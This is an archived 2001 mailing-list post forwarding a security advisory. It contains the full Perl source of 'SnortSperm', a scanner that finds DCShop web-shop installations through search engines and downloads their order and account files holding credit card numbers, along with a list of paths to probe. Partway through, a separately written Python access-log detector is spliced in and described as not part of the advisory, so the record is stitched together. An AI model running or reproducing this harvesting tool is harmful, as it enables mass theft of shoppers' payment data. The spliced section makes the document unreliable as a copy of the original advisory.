[iwar] FW: [TOOL] SnortSperm, a DCShop Order and Account Scanner

From: Robert W. Miller (snooker3@mindspring.com)
Date: 2001-08-06 06:48:37


To: <iwar@yahoogroups.com>, <htcc-l@health.state.ny.us>, "Cfid List Member" <Cfid@infobin.org>
From: "Robert W. Miller" <snooker3@mindspring.com>
Date: Mon, 6 Aug 2001 07:48:37 -0600

Be careful where you drop your credit card out there.


The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com


SnortSperm, a DCShop Order and Account Scanner
------------------------------------------------

DETAILS

The following program will search the Internet (using popular search
engines) for vulnerable installations of DCShop. When it finds one, it
will try to grab the order and account files (they contain both order
details and credit card numbers).

Exploit Code:
--- ss.pl ---
#!/usr/bin/perl
#
# SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner
# by darkman, with help of antistar and bsl4
# A proof of concept
#
# Users running windows have to download and install ActivePerl from
# www.activeperl.com, and run the script from the MS-DOS Prompt by typing:
#
# \perl\bin\perl <path of ss.pl>\ss.pl
#
# I'd like to thank Peter Helms for publishing the information regarding this
# exploit.
#
# E-mail: darkman@coderz.net
# Homepage: www.coderz.net/darkman

use LWP::Simple;
use LWP::UserAgent;
my $ua=new LWP::UserAgent;

# flush stdout (so we get 'in progress' messages)
$|=1;

# fake useragent (note: the get() calls below are LWP::Simple's, which use
# LWP::Simple's own internal user agent, so this string and the proxy()
# call further down are set on an object that get() never uses)
$ua->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)");

# hash arrays
my %unique_urls;
my %unique_sites;
my %flatfiles;
my %pathfiles;
my %additional_paths;
my %vulnerable_sites;

# scanning using search engine
sub scan_search_engine {
  $url = shift;

  print STDERR ".";
  @urls = split /\n/, get($url);
  for (@urls) {
    if (/$link/) {
      $1 =~ /(.*)\/.*$/;

      $_ = $1;
      path_traversal();
    }
    scan_search_engine("$search_engine_url$1") if (/$next/);
  }
}

# path traversal
sub path_traversal {
  $_ = "http://$_" if (not /:\/\//);
  @split_url = split /\//, $_;
  $unique_sites{$split_url[2]} = $split_url[2];

  additional_urls() if ((scalar keys %additional_paths!=0) && ($_ ne ''));

  while (not /:\/$/) {
    $unique_urls{$_}=$_;
    $_ = substr $_,0,rindex $_,"/";
  }
}

# additional urls
sub additional_urls {
  foreach $path (keys %additional_paths) {
    if ($path =~ /^\//) {
      $unique_urls{"$split_url[0]//$split_url[2]$path"} = "$split_url[0]//$split_url[2]$path";
    } else {
      $unique_urls{"$url/$path"} = "$url/$path";
    }
  }
}

# scan url
sub scan_url {
  $first_try = shift;
  $second_try = shift;

  $url_ = "$url/$first_try";

  print STDERR "Trying $url_\n";

  $page = get($url_);
  @lines = split /\x0d/, $page;
  if ((@lines+0 == 0) || ($lines[0] =~ /^</) || ($lines[0] =~ /^ </) ||
      ($lines[0] =~ /^\n</)) {
    $url_ = "$url/$second_try";

    print STDERR "Trying $url_\n";

    $page = get($url_);
    @lines = split /\x0d/, $page;
  }
  if ((@lines+0 > 0) && (not $lines[0] =~ /^</) && (not $lines[0] =~ /^ </) &&
      (not $lines[0] =~ /^\n</)) {
    print "$url_\n\n";

    for (@lines) {
      $occurrences = ($_ =~ tr/|//);
      $max_occurrences = $occurrences if ($occurrences > $max_occurrences);

      if (/^\n</) {
        print "\n";
        last;
      }
      print "$_";
    }
    $vulnerable_sites{"$stripped_url$filename"}=true;

    print "\n";
    print "\n" if ($occurrences == 1);
    print STDERR "Success.\n";
  }
}

# check arguments
foreach $opt (@ARGV) {
  $proxyserver = $1 if ($opt =~ "proxy=(.*)");
  $proxyport = $1 if ($opt =~ "port=(.*)");
  $altavista = 1 if ($opt eq "altavista");
  $google = 1 if ($opt eq "google");
  $lycos = 1 if ($opt eq "lycos");
  $nbci = 1 if ($opt eq "nbci");
  $netscape = 1 if ($opt eq "netscape");
  $yahoo = 1 if ($opt eq "yahoo");
  $flatfiles{$1} = $1 if ($opt =~ "flatfile=(.*)");
  $pathfiles{$1} = $1 if ($opt =~ "pathfile=(.*)");
}

print STDERR "SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner\n";

# show options if no valid arguments were found
if (!($altavista or $google or $lycos or $nbci or $netscape or $yahoo) &&
    (scalar keys %flatfiles==0)) {
  print STDERR "usage: ./ss.pl <options>\n\n" .
    "proxy=<proxyserver> for scanning using a proxy server\n" .
    "port=<proxyport> for specifying proxy port (default proxy port is 8080)\n" .
    "altavista for scanning using AltaVista\n" .
    "google for scanning using Google\n" .
    "lycos for scanning using Lycos\n" .
    "nbci for scanning using NBCi (use additional paths with this option)\n" .
    "netscape for scanning using Netscape Search\n" .
    "yahoo for scanning using Yahoo!\n" .
    "flatfile=<filename> for scanning using a flat file\n" .
    "pathfile=<filename> for additional paths\n\n" .
    "options can be combined";

  exit;
}

# load additional paths
foreach $pathfile (keys %pathfiles) {
  if ($pathfile ne '') {
    open(FH, $pathfile);
    while (<FH>) {
      chomp;
      $_ = $1 if (/(.*)\/$/);

      $additional_paths{$_}=$_ if ($_ ne '');
    }
  }
}

# scan through a proxy (insert proxyserver and port)
if ($proxyserver) {
  $proxyport = 8080 if (!$proxyport);

  print STDERR "using $proxyserver:$proxyport as proxy\n";

  $ua->proxy('http',"$proxyserver:$proxyport");
}

# scanning using selected search engines
if ($altavista) {
  print STDERR "\nScanning using AltaVista";

  $search_engine_url = "http://www.altavista.com";
  $link = "status='([^']*)";
  $next = "a href=\"([^\"]+).*\\[Next";

  scan_search_engine("$search_engine_url/sites/search/web?q=DCShop&pg=q&kl=XX");
}
if ($google) {
  print STDERR "\nScanning using Google";

  $search_engine_url = "http://www.google.com";
  $link = "<p><A HREF=([^>]*)";
  $next = "A HREF=([^>]+).*<b>Next<\\/b>";
  scan_search_engine("$search_engine_url/search?q=DCShop");
}
if ($lycos) {
  print STDERR "\nScanning using Lycos";

  $search_engine_url = "http://www.lycos.co.uk";
  $link = "<b><a href=\"([^\"]*)";
  $next = "A HREF=([^>]+).*<B>Forward<\\/B>";

  scan_search_engine("$search_engine_url/cgi-bin/pursuit?matchmode=and&mtemp=main&etemp=error&query=DCShop&cat=lycos");
}
if ($nbci) {
  print STDERR "\nScanning using NBCi";

  $search_engine_url = "http://www.goto.com";
  $link = "<em>([^<]*)";
  $next = "a href=\"([^\"]+).*<b>More";

  scan_search_engine("$search_engine_url/d/search/p/nbci/?Keywords=DCShop");
}
if ($netscape) {
  print STDERR "\nScanning using Netscape Search";

  $search_engine_url = "http://search.netscape.com";
  $link = "size=\"1\">([^<]*)";
  $next = "a href=\"([^\"]+).*next>>";

  scan_search_engine("$search_engine_url/search.psp?cp=nsikwphopNetscape&charset=UTF-8&search=DCShop");
}
if ($yahoo) {
  print STDERR "\nScanning using Yahoo!";

  $search_engine_url = "http://google.yahoo.com";
  $link = "#006600>([^&]*)";
  $next = "a href=\"([^\"]+).*Next 20 ";
  scan_search_engine("$search_engine_url/bin/query?p=DCShop&hc=0&hs=0");
}
# scanning using flat file(s)
foreach $flatfile (keys %flatfiles) {
  if ($flatfile ne '') {
    print STDERR "\nScanning using flat file: $flatfile";

    open(FH, $flatfile);
    while (<FH>) {
      chomp;
      $_ = $1 if (/(.*)\/$/);

      path_traversal();
    }
  }
}

# show number of sites found
$total_urls = 4*scalar keys %unique_urls;
$total_sites = scalar keys %unique_sites;
print STDERR "\nFound $total_urls URLs at $total_sites sites to scan\n";

# scan for vulnerable sites
foreach $url (sort(keys %unique_urls)) {
  @split_url = split /\//, $url;
  $stripped_url ="$split_url[0]//$split_url[2]";

  if ($current_url ne $stripped_url) {
    $current_url = $stripped_url;
    print STDERR "\n";
  }
  $filename = "/orders.txt";
  scan_url("Orders$filename","orders$filename") if (!$vulnerable_sites{"$stripped_url$filename"});
  $filename = "/auth_user_file.txt";
  scan_url("Auth_data$filename","auth_data$filename") if (!$vulnerable_sites{"$stripped_url$filename"});
}

--- paths.txt ---
/cgi-bin/DCShop
/cgi_bin/DCShop
/cgi-bin/dcshop
/cgi_bin/dcshop
/cgibin/DCShop
/cgibin/dcshop
/cgi-bin/shop
/cgi_bin/shop
/cgibin/shop
/shop/DCShop
/shop/dcshop
/shopping
/cgi-bin
/cgi_bin
/cgibin
/DCShop
/dcshop
/mall
/shop
/DC
/dc
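A defender-side counterpart, added here as an example (it is not part of the advisory or of the SnortSperm script): it parses Apache combined-format access-log lines and flags the exact flat-file requests the scanner issues (orders.txt under Orders/ or orders/, auth_user_file.txt under Auth_data/ or auth_data/), treating a 200 response with a non-empty body as evidence that the file was actually served rather than an error page. The log lines, the regexes and the function names are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Aug/2001:09:48:41 -0400] "GET /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 312 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
203.0.113.7 - - [06/Aug/2001:09:48:42 -0400] "GET /cgi-bin/DCShop/orders/orders.txt HTTP/1.0" 200 4811 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
203.0.113.7 - - [06/Aug/2001:09:48:43 -0400] "GET /cgi-bin/DCShop/Auth_data/auth_user_file.txt HTTP/1.0" 200 97 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
198.51.100.2 - - [06/Aug/2001:10:01:00 -0400] "GET /shop/index.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"$'
)

# The two flat files the scanner asks for, in both directory spellings it tries.
TARGET_RE = re.compile(
    r'/(?:Orders|orders)/orders\.txt$|/(?:Auth_data|auth_data)/auth_user_file\.txt$'
)

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def detect(log_text):
    """Return (probes, exposed): probes maps client IP -> list of requested target
    paths; exposed lists (ip, path) pairs where the server answered 200 with a
    non-empty body, i.e. the flat file was served instead of an error page."""
    probes = defaultdict(list)
    exposed = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not TARGET_RE.search(rec["path"]):
            continue
        probes[rec["ip"]].append(rec["path"])
        if rec["status"] == "200" and rec["size"] not in ("-", "0"):
            exposed.append((rec["ip"], rec["path"]))
    return dict(probes), exposed

if __name__ == "__main__":
    probes, exposed = detect(SAMPLE_LOG)
    for ip, paths in probes.items():
        print(f"{ip}: {len(paths)} DCShop flat-file probe(s)")
    for ip, path in exposed:
        print(f"EXPOSED: {path} served to {ip}")
```

Matching is done on the request path rather than on the User-Agent string, so it does not depend on which agent string the scanner's requests actually carry.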


ADDITIONAL INFORMATION

The information has been provided by Sandra <mailto:auto91991@hushmail.com>.


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages.


Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker3@mindspring.com
mailto:cicactf@iex.net
http://www2.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net








This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:39 PDT